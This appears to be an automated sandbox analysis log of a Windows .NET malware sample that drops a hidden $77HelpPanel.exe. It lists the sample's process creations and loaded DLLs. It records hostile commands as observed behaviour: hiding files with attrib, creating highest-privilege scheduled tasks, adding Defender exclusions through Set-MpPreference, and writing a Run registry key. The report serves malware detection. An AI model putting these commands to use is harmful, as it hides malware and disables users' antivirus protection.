Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver"
Source: C:\Windows\System32\attrib.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"
Source: C:\Windows\System32\attrib.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77HelpPanel.exe
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77HelpPanel.exe
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "HelpPanel_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe "\$77HelpPanel.exe" /AsAdmin
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver"
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77HelpPanel.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77HelpPanel.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "HelpPanel_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: YDW0S5K7hi.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: YDW0S5K7hi.exe | Static PE information: Image base 0x140000000 > 0x60000000
                  Source: YDW0S5K7hi.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  Source: YDW0S5K7hi.exe, MessageRead.cs | .Net Code: RecoveryData System.Reflection.Assembly.Load(byte[])
                  Source: $77HelpPanel.exe.0.dr, MessageRead.cs | .Net Code: RecoveryData System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Code function: 10_2_00007FFAAB412550 push eax; retf 10_2_00007FFAAB41261D

                  Persistence and Installation Behavior

                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Process created: attrib.exe
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe

                  Boot Survival

                  Source: Yara match | File source: YDW0S5K7hi.exe, type: SAMPLE
                  Source: Yara match | File source: 0.0.YDW0S5K7hi.exe.4b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.YDW0S5K7hi.exe.3e30b40.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.YDW0S5K7hi.exe.3e30b40.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000000.1355697494.00000000004B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1404296493.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: YDW0S5K7hi.exe PID: 7600, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, type: DROPPED
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77HelpPanel.exe
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULL

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
